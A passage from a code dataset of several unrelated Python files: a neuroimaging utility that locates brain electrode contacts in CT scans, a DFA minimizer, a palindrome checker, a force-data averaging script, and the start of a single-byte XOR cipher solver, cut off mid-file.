None\n finesearch : int, optional\n angle in degrees, by default None\n \"\"\"\n\n cmd = f\"flirt -in {inp} -ref {ref}\"\n if xfm is not None:\n cmd += f\" -omat {xfm}\"\n if out is not None:\n cmd += f\" -out {out}\"\n if dof is not None:\n cmd += f\" -dof {dof}\"\n if bins is not None:\n cmd += f\" -bins {bins}\"\n if interp is not None:\n cmd += f\" -interp {interp}\"\n if cost is not None:\n cmd += f\" -cost {cost}\"\n if searchrad is not None:\n cmd += \" -searchrx -180 180 -searchry -180 180 \" + \"-searchrz -180 180\"\n if sch is not None:\n cmd += f\" -schedule {sch}\"\n if wmseg is not None:\n cmd += f\" -wmseg {wmseg}\"\n if init is not None:\n cmd += f\" -init {init}\"\n run(cmd)\n\ndef align_nonlinear(inp, ref, xfm, out, warp, ref_mask=None, in_mask=None, config=None):\n \"\"\"Aligns two images using nonlinear methods and stores the transform between them using fnirt\n Parameters\n ----------\n inp : str\n path to the input image\n ref : str\n path to the reference image that the input will be aligned to\n xfm : str\n path to the file containing the affine transform matrix created by align()\n out : str\n path for the desired output image\n warp : str\n the path to store the output file containing the nonlinear warp coefficients/fields\n ref_mask : str, optional\n path to the reference image brain_mask, by default None\n in_mask : str, optional\n path for the file with mask in input image space, by default None\n config : str, optional\n path to the config file specifying command line arguments, by default None\n \"\"\"\n\n cmd = f\"fnirt --in={inp} --ref={ref} --aff={xfm} --iout={out} --cout={warp} --warpres=8,8,8\"\n if ref_mask is not None:\n cmd += f\" --refmask={ref_mask} --applyrefmask=1\"\n if in_mask is not None:\n cmd += f\" --inmask={in_mask} --applyinmask=1\"\n if config is not None:\n cmd += f\" --config={config}\"\n run(cmd)\n\ndef dataExtraction(intraFile, thre=0.2):\n rawData = nib.load(intraFile).get_fdata()\n maxVal = np.amax(rawData)\n # print(f\"maxVal={maxVal}\")\n thre = maxVal * thre\n threData = np.copy(rawData)\n threData[threData < thre] = 0\n xs, ys, zs = np.where(threData != 0)\n return xs, ys, zs\n\ndef trackRecognition(patient, cmd_hough3d, CTresult_dir, intraFile, thre=0.2):\n \n xs, ys, zs = dataExtraction(intraFile, thre)\n \n X = np.transpose(np.array((xs, ys, zs)))\n # print(X.shape)\n # fname = f\"{CTresult_dir}{patient}_3dPointClouds.dat\"\n fname = os.path.join(CTresult_dir, f\"{patient}_3dPointClouds.dat\")\n np.savetxt(fname, X, fmt='%.4f', delimiter=',', newline='\\n', header='point clouds', footer='', comments='# ', encoding=None)\n \n cmd_hough = f\"{cmd_hough3d} -o {CTresult_dir}{patient}.txt -minvotes 5 {fname}\"\n run(cmd=cmd_hough)\n return xs, ys, zs\n\ndef locateLine(row, info):\n ax = info[row][1]\n ay = info[row][2]\n az = info[row][3]\n bx = info[row][4]\n by = info[row][5]\n bz = info[row][6]\n axx = np.linspace(ax, ax+bx*50, 50)\n ayy = np.linspace(ay, ay+by*50, 50)\n azz = np.linspace(az, az+bz*50, 50)\n return axx, ayy, azz\n\nclass Preprocess_thread(QThread):\n\n finished = pyqtSignal()\n\n def __init__(self):\n super(Preprocess_thread, self).__init__()\n\n def run(self): # erode, skull, intra_save\n mask_file = os.path.join(self.directory_surf, \"mri\", \"mask.mgz\")\n img_mask = nib.load(mask_file)\n data_mask = img_mask.get_fdata()\n data_mask_ero = ndimage.morphology.binary_erosion(data_mask, iterations=self.ero_itr)\n \n CTreg_file = os.path.join(self.directory_ct, f\"{self.patient}CT_Reg.nii.gz\")\n img_ct = nib.load(CTreg_file)\n data_ct = img_ct.get_fdata()\n maxVal = np.amax(data_ct)\n self.thre = self.thre / 100\n thre = maxVal * self.thre\n \n data_ct[data_mask_ero == 0] = 0\n img1 = nib.Nifti1Image(data_ct, img_ct.affine)\n intra_file1 = os.path.join(self.directory_ct, f\"{self.patient}CT_intra.nii.gz\")\n nib.save(img1, intra_file1)\n \n data_ct[data_ct < thre] = 0\n\n img0 = nib.Nifti1Image(data_ct, img_ct.affine)\n intra_file = os.path.join(self.directory_ct, f\"{self.patient}CT_intracranial_{self.thre}_{self.K}_{self.ero_itr}.nii.gz\")\n nib.save(img0, intra_file)\n self.finished.emit()\n\nclass PreprocessResult_thread(QThread):\n\n send_axes = pyqtSignal(ndarray)\n\n def __init__(self):\n super(PreprocessResult_thread, self).__init__()\n\n def run(self):\n intra_file = self.CTintra_file\n xs, ys, zs = dataExtraction(intraFile=intra_file, thre=self.thre)\n pointsArray = np.transpose(np.vstack((xs, ys, zs)))\n self.send_axes.emit(pointsArray)\n\nclass GenerateLabel_thread(QThread):\n\n finished = pyqtSignal(int)\n\n def __init__(self):\n super(GenerateLabel_thread, self).__init__()\n\n def run(self):\n # process 3d line hough transform\n # hough_file = f\"{self.directory_ct}{self.patient}.txt\"\n hough_file = os.path.join(self.directory_ct, f\"{self.patient}.txt\")\n if not os.path.exists(hough_file):\n xs, ys, zs = trackRecognition(patient=self.patient, cmd_hough3d=CMD_Hough3D, CTresult_dir=self.directory_ct, intraFile=self.intra_file, thre=0)\n else: # temporarily\n # xs, ys, zs = utils.trackRecognition(patient=patient, cmd_hough3d=CMD_Hough3D, CTresult_dir=CTresult_dir, intraFile=intra_file, thre=Thre)\n xs, ys, zs = dataExtraction(intraFile=self.intra_file, thre=0)\n pass\n \n # read detected lines' info\n elec_track = []\n with open(hough_file, 'r') as f:\n for line in f.readlines():\n a = re.findall(r\"\\d+\\.?\\d*\", line)\n for i in range(len(a)):\n a[i] = float(a[i])\n elec_track.append(a)\n # print(f\"{len(elec_track)} tracks has been detected!\\n\")\n # print(elec_track)\n elec_track = np.array(elec_track)\n K_check = elec_track.shape[0]\n if K_check < self.K:\n self.finished.emit(1)\n else: # if K_check != K:\n print(f\"Warning: {self.K} electrodes implanted, but {K_check} has been clustered by Hough!\")\n # sys.exit()\n \n # process a gaussian mixture model for bug fixing\n centroids = np.array(elec_track[0:self.K, 1:4])\n # print(centroids)\n X = np.transpose(np.vstack((xs, ys, zs)))\n gmm = GMM(n_components=self.K, covariance_type='full',means_init=centroids, random_state=None).fit(X)\n labels = gmm.predict(X)\n # print(labels)\n \n Labels = np.zeros((256, 256, 256)) # labeled space\n for i in range(self.K):\n ind = np.where(labels == i)\n Labels[xs[ind], ys[ind], zs[ind]] = i + 1\n np.save(os.path.join(self.directory_ct, f\"{self.patient}_labels.npy\"), Labels, allow_pickle=True, fix_imports=True)\n self.finished.emit(0)\n\n# class LabelResult_thread(QThread):\n# def __init__(self):\n# super(LabelResult_thread, self).__init__()\n\n# def run(self):\n# print('Yaah!')\n\nclass ContactSegment_thread(QThread):\n\n finished = pyqtSignal()\n\n def __init__(self):\n super(ContactSegment_thread, self).__init__()\n\n def run(self):\n print('Yaah!')\n for i in range(self.K):\n iLabel = i + 1\n # xxx = electrode.ElectrodeSeg(filePath=self.directory_labels, patName=self.patName, iLabel=iLabel, numMax=self.numMax, diameterSize=self.diameterSize, spacing=self.spacing, gap=self.gap)\n xxx = ElectrodeSeg(filePath=self.directory_labels, patName=self.patName, iLabel=iLabel, numMax=self.numMax, diameterSize=self.diameterSize, spacing=self.spacing, gap=self.gap)\n xxx.pipeline()\n print(xxx.elecPos)\n self.finished.emit()\n\ndef savenpy(filePath, patientName):\n # dir = f\"{filePath}/{patientName}_result\"\n dir = os.path.join(filePath, f\"{patientName}_result\")\n # dir1 = f\"{filePath}/{patientName}_data\"\n elec_dict = {}\n for root, dirs, files in os.walk(dir, topdown=True):\n # print('files:', files)\n if '.DS_Store' in files:\n files.remove('.DS_Store')\n if 'chnXyzDict.npy' in files:\n files.remove('chnXyzDict.npy')\n for file in files:\n elec_name = file.split('.')[0]\n elec_info = np.loadtxt(os.path.join(root, file))\n \n elec_info = elec_info # [1:, :] # [:,np.array([2,1,0])]\n elec_dict[elec_name] = elec_info\n \n # np.save(f\"{filePath}/chnXyzDict.npy\", elec_dict)\n np.save(os.path.join(filePath, f\"chnXyzDict.npy\"), elec_dict)\n\ndef lookupTable(subdir, patient, ctdir, elec_label):\n # annot_dir = f\"{subdir}/mri/aparc.a2009s+aseg.mgz\"\n annot_dir = os.path.join(subdir, 'mri', 'aparc.a2009s+aseg.mgz')\n lookup_table = f\"FreeSurferColorLUT.txt\"\n annot_img = nib.load(annot_dir).get_fdata()\n \n # elecs_file = f\"{ctdir}/{patient}_result/{elec_label}.txt\"\n elecs_file = os.path.join(ctdir, f\"{patient}_result/{elec_label}.txt\")\n elecs_xyz = np.loadtxt(elecs_file, dtype='float', comments='#')\n elecs_xyz = elecs_xyz[:, [0, 2, 1]]\n elecs_xyz[:, 0] = 128 - elecs_xyz[:, 0]\n elecs_xyz[:, 1] = 128 - elecs_xyz[:, 1]\n elecs_xyz[:, 2] = 128 + elecs_xyz[:, 2] \n \n labels = []\n for row in range(elecs_xyz.shape[0]):\n x = elecs_xyz[row, 0]\n y = elecs_xyz[row, 1]\n z = elecs_xyz[row, 2]\n x1 = int(x)\n x2 = math.ceil(x)\n y1 = int(y)\n y2 = math.ceil(y)\n z1 = int(z)\n z2 = math.ceil(z)\n val = [0]\n val.append(annot_img[x1, y1, z1])\n val.append(annot_img[x1, y1, z2])\n val.append(annot_img[x1, y2, z1])\n val.append(annot_img[x1, y2, z2])\n val.append(annot_img[x2, y1, z1])\n val.append(annot_img[x2, y1, z2])\n val.append(annot_img[x2, y2, z1])\n val.append(annot_img[x2, y2, z2])\n val = val[1:]\n labels.append(max(set(val), key = val.count))\n \n # print(labels)\n labels_name = []\n for label in labels:\n with open(lookup_table, 'r') as f:\n lines = f.readlines()\n rows = len(lines)\n for row in range(rows):\n line = lines[row][0: 8]\n b = str(int(label))\n if re.match(b, line):\n # print(lines[row])\n a = lines[row][len(b): -16].strip()\n labels_name.append(a)\n break\n return labels_name\n\n\nclass ElectrodeSeg:\n def __init__(self, filePath, patName, iLabel, numMax, diameterSize, spacing, gap):\n super(ElectrodeSeg, self).__init__()\n # set up input initials\n self.filePath = filePath\n self.patientName = patName\n \n raw_flag = 0 # check for the filepath existance\n for root, dirs, files in os.walk(self.filePath):\n for filename in files:\n if re.search(r'CT_intra.nii.gz', filename):\n raw_flag = 1\n # self.rawDataPath = f\"{self.filePath}/{filename}\"\n self.rawDataPath = os.path.join(self.filePath, filename)\n break\n if not raw_flag:\n sys.exit()\n\n label_flag = 0\n for root, dirs, files in os.walk(self.filePath):\n for filename in files:\n if re.search(r'_labels.npy', filename):\n label_flag = 1\n # self.labelsPath = f\"{self.filePath}/{filename}\"\n self.labelsPath = os.path.join(self.filePath, filename)\n break\n if not label_flag:\n sys.exit()\n \n self.rawData = nib.load(self.rawDataPath).get_fdata()\n self.labels = np.load(self.labelsPath)\n self.iLabel = iLabel\n self.numMax = numMax\n self.diameterSize = diameterSize\n self.spacing = spacing\n self.gap = gap\n\n self.affine = nib.load(self.rawDataPath).affine\n self.inv_vox2ras_tkr = np.array([[-1, 0, 0, 128], [0, 0, -1, 128], [0, 1, 0, 128], [0, 0, 0, 1]], dtype=np.float32)\n\n # some calculations to get the rest initials\n self.labelValues = np.unique(self.labels)\n self.numElecs = len(self.labelValues) - 1\n if self.numElecs > 8: # remove 'I' from the alphabet list, a trivial custom not to name the electrode 'I'\n self.alphaList = [chr(i) for i in range(65, 66+self.numElecs)]\n self.alphaList.pop(8)\n else:\n self.alphaList = [chr(i) for i in range(65, 65+self.numElecs)]\n print(self.iLabel)\n self.iValue = self.labelValues[self.iLabel]\n print(self.iValue)\n self.nameLabel = self.alphaList[self.iLabel-1]\n print(self.nameLabel)\n data_elec = np.copy(self.labels)\n data_elec[np.where(self.labels != self.iValue)] = 0 ## isolate a single cluster of voxels belonging to the ith electrode\n self.xs, self.ys, self.zs = np.where(data_elec != 0) \n self.pos_elec = np.transpose(np.vstack((self.xs, self.ys, self.zs))) ## positions of these voxels\n ### test!\n data_elec1 = np.copy(self.labels)\n data_elec1[np.where(self.labels == self.iValue)] = 0\n self.xrest, self.yrest, self.zrest = np.where(data_elec1 != 0)\n self.rawData[self.xrest, self.yrest, self.zrest] = 0\n ### test!\n self.rawData_single = self.rawData\n xmin = np.amin(self.xs)\n xmax = np.amax(self.xs)\n ymin = np.amin(self.ys)\n ymax = np.amax(self.ys)\n zmin = np.amin(self.zs)\n zmax = np.amax(self.zs)\n # self.rawData_single[self.xs, self.ys, self.zs] = self.rawData_single[self.xs, self.ys, self.zs] * 3\n self.rawData_single[xmin:xmax+1, ymin:ymax+1, zmin:zmax+1] = self.rawData_single[xmin:xmax+1, ymin:ymax+1, zmin:zmax+1] * 3\n\n # self.resultPath = f\"{self.filePath}/{self.patientName}_result\"\n self.resultPath = os.path.join(self.filePath, f\"{self.patientName}_result\")\n if not os.path.exists(self.resultPath):\n os.mkdir(self.resultPath)\n # self.resultFile = f\"{self.resultPath}/{self.nameLabel}.txt\"\n self.resultFile = os.path.join(self.resultPath, f\"{self.nameLabel}.txt\")\n self.elecPos = [0, 0, 0]\n self.headStart = [0, 0, 0]\n self.targetPoint = [0, 0, 0]\n self.regressInfo = [0, 0, 0, 0]\n \n def pipeline(self):\n self.startPoint()\n self.contactPoint(1)\n self.regression()\n for j in np.arange(self.numMax - 1):\n # if self.rawData[int(round(self.elecPos[-1,0])), int(round(self.elecPos[-1,1])), int(round(self.elecPos[-1,2]))] == 0:\n # self.elecPos = self.elecPos[0:-1, :]\n # break\n if int(self.elecPos[-1,0])==int(self.elecPos[-2,0]) and int(self.elecPos[-1,1])==int(self.elecPos[-2,1]) and int(self.elecPos[-1,2])==int(self.elecPos[-2,2]):\n self.elecPos = self.elecPos[0:-1, :]\n break\n self.step()\n if self.flag_step_stop:\n break\n self.elecPos = self.elecPos[1:, :]\n # print(self.elecPos)\n self.resulting()\n # return self.elecPos\n \n def resulting(self):\n self.elecPos_true = np.copy(self.elecPos)\n self.elecPos_true[:, 0] = 128 - self.elecPos[:, 0]\n self.elecPos_true[:, 1] = 128 - self.elecPos[:, 1]\n self.elecPos_true[:, 2] = self.elecPos[:, 2] - 128\n self.elecPos_true = self.elecPos_true[:, [0, 2, 1]]\n \n self.elecFilepath = os.path.join(self.filePath, f\"{self.patientName}_result\")\n if not os.path.exists(self.elecFilepath):\n os.mkdir(self.elecFilepath)\n \n self.elecFile = os.path.join(self.elecFilepath, f\"{self.nameLabel}.txt\")\n with open(self.elecFile, \"ab\") as f:\n f.seek(0)\n f.truncate()\n # f.write(b\"\\n\")\n np.savetxt(f, self.elecPos_true, fmt='%10.8f', delimiter=' ', newline='\\n', header=f\"{self.elecPos_true.shape[0]}\")\n \n # calculate freeview-version results\n tmp = np.matmul(self.affine, self.inv_vox2ras_tkr)\n tmp1 = np.matmul(tmp, np.transpose(np.column_stack((self.elecPos_true, np.ones((self.elecPos_true.shape[0], ))))))\n self.elecPos_freeview = np.transpose(tmp1)[:, 0:3]\n\n self.elecFilepath_freeview = os.path.join(self.filePath, f\"{self.patientName}_freeview_result\")\n if not os.path.exists(self.elecFilepath_freeview):\n os.mkdir(self.elecFilepath_freeview)\n \n self.elecFile_freeview = os.path.join(self.elecFilepath_freeview, f\"{self.nameLabel}.txt\")\n with open(self.elecFile_freeview, \"ab\") as f:\n f.seek(0)\n f.truncate()\n # f.write(b\"\\n\")\n np.savetxt(f, self.elecPos_freeview, fmt='%10.8f', delimiter=' ', newline='\\n', header=f\"{self.elecPos_freeview.shape[0]}\")\n \n \n\n ## target point functions\n def startPoint(self):\n ## firstly find a voxel near the target\n x = [np.max(self.xs), np.min(self.xs)]\n y = [np.max(self.ys), np.min(self.ys)]\n z = [np.max(self.zs), np.min(self.zs)]\n self.reg1 = LinearRegression().fit(X=self.xs.reshape(-1,1), y=self.ys) # x-y\n self.reg2 = LinearRegression().fit(X=self.xs.reshape(-1,1), y=self.zs) # x-z\n self.reg3 = LinearRegression().fit(X=self.ys.reshape(-1,1), y=self.zs) # y-z\n\n coefs = [abs(self.reg1.coef_), abs(self.reg2.coef_), abs(self.reg3.coef_)]\n coef_min = coefs.index(min(coefs))\n if coef_min == 0:\n index = [0 if self.reg2.coef_>0 else 1, 0 if self.reg3.coef_>0 else 1, 0]\n elif coef_min == 1:\n index = [0 if self.reg1.coef_>0 else 1, 0, 0 if self.reg3.coef_>0 else 1]\n else:\n index = [0, 0 if self.reg1.coef_>0 else 1, 0 if self.reg2.coef_>0 else 1]\n indexreverse = [~index[0], ~index[1], ~index[2]]\n\n point1 = np.array([x[index[0]], y[index[1]], z[index[2]]])\n point2 = np.array([x[indexreverse[0]], y[indexreverse[1]], z[indexreverse[2]]])\n center = 127.5 * np.ones(3)\n diff1 = point1 - center\n diff2 = point2 - center\n headStart = point2 if np.sum(np.transpose(diff1)*diff1) > np.sum(np.transpose(diff2)*diff2) else point1\n self.direction = indexreverse if np.sum(np.transpose(diff1)*diff1) > np.sum(np.transpose(diff2)*diff2) else index\n\n ## secondly specify a target voxel in label voxels\n diffs = self.pos_elec - headStart\n diffs2 = np.power(diffs[:,0], 2) + np.power(diffs[:,1], 2) + np.power(diffs[:,2], 2)\n headPointPos = np.argmin(diffs2)\n self.headStart = self.pos_elec[headPointPos, :]\n \n def converge(self, x, y, z):\n ## converge to the mass center of a cluster of voxels\n n = self.diameterSize\n delta = math.ceil(round((n - 1) / 2, 1)) # represent the radius of the electrode contact\n ## extract a cubic ROI of the raw CT data\n seq_s = np.arange(x - delta, x + delta + 1)\n seq_r = np.arange(y - delta, y + delta + 1)\n seq_c = np.arange(z - delta, z + delta + 1)\n\n if not ((np.array(seq_s) > 0).all() and (np.array(seq_r) > 0).all() and (np.array(seq_c) > 0).all()):\n print('Error: index too small 0!')\n return 0, 0, 0\n elif not ((np.array(seq_s) < 256).all() and (np.array(seq_r) < 256).all() and (np.array(seq_c) < 256).all()):\n print('Error: index too large 256!')\n return 0, 0, 0\n \n else:\n ## extract the ROI cubic\n # test!!!\n matrixVoxels = self.rawData_local[seq_s[0]:seq_s[-1]+1, seq_r[0]:seq_r[-1]+1, seq_c[0]:seq_c[-1]+1]\n sumVoxels = np.sum(matrixVoxels)\n\n if (np.sum(matrixVoxels)== 0):\n print('Error: Converge to non-elec region!')\n return 0, 0, 0\n else:\n f = np.zeros((1, 4))\n for index, element in np.ndenumerate(matrixVoxels):\n x, y, z = index\n tmp = np.array([x+seq_s[0], y+seq_r[0], z+seq_c[0], element])\n f = np.vstack((f, tmp))\n f = f[1:]\n CM = np.average(f[:,:3], axis=0, weights=f[:,3])\n C100 = CM[0]\n C010 = CM[1]\n C001 = CM[2]\n \n x1 = C100\n y1 = C010\n z1 = C001\n return x1, y1, z1\n \n def contactPoint(self, target):\n ## converge to an electrode contact position\n x0 = self.headStart[0] if target == 1 else self.x0\n y0 = self.headStart[1] if target == 1 else self.y0\n z0 = self.headStart[2] if target == 1 else self.z0\n \n x = int(round(x0))\n y = int(round(y0))\n z = int(round(z0))\n print(f\"initial start voxel:({x0}, {y0}, {z0})\")\n \n # test!!!\n self.rawData_local = self.rawData_single\n diff_array = self.pos_elec - np.array([x0, y0, z0])\n elec_diffs = np.sqrt(np.dot(diff_array, np.transpose(diff_array)).diagonal())\n ind_diffs = np.where(elec_diffs <= 2)\n self.rawData_local[self.xs[ind_diffs], self.ys[ind_diffs], self.zs[ind_diffs]] = self.rawData_local[self.xs[ind_diffs], self.ys[ind_diffs], self.zs[ind_diffs]] * 2\n (x1, y1, z1) = self.converge(x, y, z)\n itr = 1\n flag_convergence = 0\n while not ((x==int(round(x1))) and (y==int(round(y1))) and (z==int(round(z1)))):\n x = int(round(x1))\n y = int(round(y1))\n z = int(round(z1))\n (x1, y1, z1) = self.converge(x, y, z)\n itr = itr + 1\n if itr > 5:\n flag_convergence = 1\n break\n \n print(f\"Convergent center voxel coordinates:({x1},{y1},{z1})\")\n print(f\"Convergent center voxel value:{self.rawData[int(round(x1)), int(round(y1)), int(round(z1))]}\")\n \n self.flag_step_stop = 0\n if (x1, y1, z1) == (0, 0, 0):\n self.flag_step_stop = 1\n print('here1,converged to 0!')\n # self.elecPos = np.vstack([self.elecPos, [x1, y1, z1]])\n \n else:\n if not flag_convergence:\n print('here2,converged normally!') \n self.targetPoint = [x1, y1, z1] if target == 1 else self.targetPoint\n self.elecPos = np.vstack([self.elecPos, [x1, y1, z1]])\n else:\n print('here3, maybe not convergent!') \n self.targetPoint = [x1, y1, z1] if target == 1 else self.targetPoint\n self.elecPos = np.vstack([self.elecPos, [x1, y1, z1]])\n\n def regression(self):\n ## regress an electrode and find the axis direction\n X = np.transpose(np.vstack((self.xs, self.ys)))\n y = self.zs\n \n forcedX = np.transpose(np.array([self.targetPoint[0], self.targetPoint[1]]))\n forcedy = self.targetPoint[2]\n \n ## implant a contraint regression, forcing on the head point\n X = X - forcedX\n y = y - forcedy\n reg = Lasso(fit_intercept=False).fit(X=X, y=y)\n reg.intercept_ = reg.intercept_ + forcedy - np.dot(forcedX, reg.coef_)\n ## regression between x and y\n reg2 = LinearRegression(fit_intercept=True).fit(X=self.xs.reshape(-1,1), y=self.ys)\n \n self.coef = reg.coef_\n self.intercept = reg.intercept_\n self.coef2 = reg2.coef_\n self.intercept2 = reg2.intercept_\n \n def step(self):\n ## step out along the electrode axis\n dis = self.spacing # initial step size\n\n # delta_x = np.sqrt(np.power(dis, 2) / (1 + np.power(self.coef2[0],2) + np.power(np.dot(self.coef, np.array([1, self.coef2[0]])) ,2)))\n # delta_y = np.dot(self.coef2[0], delta_x)\n # delta_z = np.dot(self.coef, np.array([1, self.coef2[0]])) * delta_x\n \n diff_x = np.max(self.xs) - np.min(self.xs)\n diff_y = np.max(self.ys) - np.min(self.ys)\n diff_z = np.max(self.zs) - np.min(self.zs)\n a = np.power(diff_x,2) + np.power(diff_y,2) + np.power(diff_z,2)\n delta_x = diff_x * np.sqrt(np.power(dis,2) / a)\n delta_y = diff_y * np.sqrt(np.power(dis,2) / a)\n delta_z = diff_z * np.sqrt(np.power(dis,2) / a)\n\n # delta_x = self.reg2.coef_ * np.sqrt(np.power(dis,2) / (1 + np.power(self.reg2.coef_,2) + np.power(self.reg3.coef_,2)))\n # delta_y = self.reg3.coef_ * np.sqrt(np.power(dis,2) / (1 + np.power(self.reg2.coef_,2) + np.power(self.reg3.coef_,2)))\n # delta_z = np.sqrt(np.power(dis,2) / (1 + np.power(self.reg2.coef_,2) + np.power(self.reg3.coef_,2)))\n\n self.x0 = np.int(self.elecPos[-1,0] - np.round(delta_x)) if ((self.direction[0]==-2) or (self.direction[0]==0)) else np.int(self.elecPos[-1,0] + np.round(delta_x))\n self.y0 = np.int(self.elecPos[-1,1] - np.round(delta_y)) if ((self.direction[1]==-2) or (self.direction[1]==0)) else np.int(self.elecPos[-1,1] + np.round(delta_y))\n self.z0 = np.int(self.elecPos[-1,2] - np.round(delta_z)) if ((self.direction[2]==-2) or (self.direction[2]==0)) else np.int(self.elecPos[-1,2] + np.round(delta_z))\n \n self.contactPoint(0)\n","repo_name":"HongLabTHU/BrainQuake","sub_path":"BrainQuake/utils/elec_utils.py","file_name":"elec_utils.py","file_ext":"py","file_size_in_byte":28259,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"} +{"seq_id":"71119239236","text":"def minimize_dfa(dfa):\n num_states = len(dfa[\"states\"])\n distinguishability = [[False] * num_states for _ in range(num_states)]\n\n for i in range(num_states):\n for j in range(i + 1, num_states):\n if (\n dfa[\"states\"][i] in dfa[\"accept_states\"]\n and dfa[\"states\"][j] not in dfa[\"accept_states\"]\n ) or (\n dfa[\"states\"][j] in dfa[\"accept_states\"]\n and dfa[\"states\"][i] not in dfa[\"accept_states\"]\n ):\n distinguishability[i][j] = True\n while True:\n change = False\n for i in range(num_states):\n for j in range(i + 1, num_states):\n if not distinguishability[i][j]:\n for symbol in dfa[\"alphabet\"]:\n index_i = dfa[\"states\"].index(\n dfa[\"transition\"][(dfa[\"states\"][i], symbol)]\n )\n index_j = dfa[\"states\"].index(\n dfa[\"transition\"][(dfa[\"states\"][j], symbol)]\n )\n if distinguishability[index_i][index_j]:\n distinguishability[i][j] = True\n change = True\n elif distinguishability[index_j][index_i]:\n distinguishability[i][j] = True\n change = True\n\n if not change:\n break\n equivalent_groups = {}\n for i in range(num_states):\n equivalent_groups[i] = set()\n for j in range(i, num_states):\n if not distinguishability[i][j]:\n equivalent_groups[i].add(dfa[\"states\"][j])\n min_dfa = {\n \"states\": [],\n \"alphabet\": dfa[\"alphabet\"],\n \"transition\": {},\n \"start_state\": None,\n \"accept_states\": set(),\n }\n\n for group in equivalent_groups.values():\n if dfa[\"start_state\"] in group:\n min_dfa[\"start_state\"] = list(group)[0]\n if any(state in dfa[\"accept_states\"] for state in group):\n min_dfa[\"accept_states\"].update(group)\n min_dfa[\"states\"].append(list(group)[0])\n\n for state in min_dfa[\"states\"]:\n for symbol in dfa[\"alphabet\"]:\n next_state = dfa[\"transition\"].get((state, symbol), None)\n if next_state is not None:\n min_dfa[\"transition\"][(state, symbol)] = [\n s\n for s in min_dfa[\"states\"]\n if next_state in equivalent_groups[dfa[\"states\"].index(s)]\n ][0]\n\n return min_dfa\ndfa = {\n \"states\": [\"q0\", \"q1\", \"q2\"],\n \"alphabet\": {\"0\", \"1\"},\n \"transition\": {\n (\"q0\", \"0\"): \"q1\",\n (\"q0\", \"1\"): \"q2\",\n (\"q1\", \"0\"): \"q0\",\n (\"q1\", \"1\"): \"q2\",\n (\"q2\", \"0\"): \"q2\",\n (\"q2\", \"1\"): \"q2\",\n },\n \"start_state\": \"q0\",\n \"accept_states\": [\"q0\"],\n}\n\nminimized_dfa = minimize_dfa(dfa)\n\nprint(\"Minimized DFA States:\", minimized_dfa[\"states\"])\nprint(\"Minimized DFA Alphabet:\", minimized_dfa[\"alphabet\"])\nprint(\"Minimized DFA Transition Function:\", minimized_dfa[\"transition\"])\nprint(\"Minimized DFA Start State:\", minimized_dfa[\"start_state\"])\nprint(\"Minimized DFA Accept States:\", minimized_dfa[\"accept_states\"])\n","repo_name":"TartejBrothers/App-Codes","sub_path":"Week13/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32198927617","text":"\ndef check_palindrome(string):\n # getting string length and initialising spliting indeces\n length = len(string)\n mid = length // 2\n delim = mid\n\n # checking if string is having odd length or not\n if length % 2 != 0: delim += 1\n\n # spliting strings\n first = string[:mid]\n second = string[delim:]\n\n # getting last value of second string\n last = len(second) - 1\n\n # traversing first from L -> R and second from R -> L\n for x in range(len(first)):\n # return false on any non relevant character\n if first[x] != second[last]: return False\n # decrease the iterator for second by 1\n last -=1\n return True\n","repo_name":"Meg2tron/python-1","sub_path":"code/palindrome_checker/palindrome_checker.py","file_name":"palindrome_checker.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24551203819","text":"import re\nimport sys\n\nDEFAULT_FILE_PATH = './runtime/postProcessing/forces/0/forces.dat'\n\ndef get_default_path():\n return DEFAULT_FILE_PATH\n\ndef run(start_step = 0, end_step = 1000, file_path=DEFAULT_FILE_PATH):\n data = [[], [], []]\n with open(file_path) as file:\n for line in file.readlines():\n # ignore comments\n if line[0] == '#':\n continue\n # split line into components, ignoring white space and parentheses\n components = tuple(filter(lambda x: x != '', re.split(\"[ \\t\\n()]\", line)))\n # check if time step is within range\n time_step = int(components[0])\n if time_step < start_step or time_step > end_step:\n continue\n # add to running average\n for i in range(len(data)):\n data[i].append(float(components[i+1]))\n average = [0] * len(data)\n stdev = [0] * len(data)\n\n for i in range(len(data)):\n average[i] = sum(data[i]) / len(data[i])\n\n for i in range(len(data)):\n for point in data[i]:\n stdev[i] += (point - average[i])**2\n stdev[i] = (stdev[i] / len(data[i]))**0.5\n\n return (average, stdev)\n\nif __name__ == '__main__':\n try:\n start_step = int(sys.argv[1])\n end_step = int(sys.argv[2])\n assert start_step >= 0\n assert end_step > start_step\n except:\n start_step = 0\n end_step = 1000\n print(\"Missing or invalid time step range, using defaults of %s to %s.\" % (start_step, end_step))\n\n if len(sys.argv) > 3:\n file_path = sys.argv[3]\n else:\n file_path = DEFAULT_FILE_PATH\n\n average, stdev = run(start_step, end_step, file_path)\n print('Average: ', average)\n print('Stdev: ', stdev)","repo_name":"RLin8910/Charger-NASCAR-Aero","sub_path":"running_average.py","file_name":"running_average.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11569487154","text":"# Single byte XOR cipher.\n# https://en.wikipedia.org/wiki/Etaoin_shrdlu\n\nimport binascii\nimport collections\n\n\ndef probability_of_being_legit_string(string):\n # According to english letter frequency table,\n # \"etaoin shrdlu\" is a most frequent english\n # letters in words - from heigher to lower frequency of occurence\n\n return string.count(' ') + string.count('e') + string.count('t') + string.count('a') + string.count(\n 'o') + string.count('i') + string.count('n')\n\n # Including all the “etaoin shrdul”, will maximize \n # the given function, and hence also the accuracy of the prediction.\n #Though, I have incluced only etaoin, and its giving me accurate result all the time\n\n\n \n \n'''We have give a hex encoded text, first we unhexlify function. Since the encryption is performed by xor each bit \nwith one of the ascii character i.e. ranging from 0-255, we re-xor it to get the message back. Doing so, we will get\na big list i.e. list of list (big list in our case below). Now, we will pass each list to function \nrobability_of_being_legit_string, and it will return our legit string. Voila!, you cracked it'''\n\n\ndef __single_char_XOR_cypher(encoded):\n # Given hex text\n nums = binascii.unhexlify(encoded)\n big_list = []\n for key in range(256):\n arr = ''\n for num in nums:\n arr = arr + chr(num ^ key)\n big_list.append(arr)\n return max(big_list, 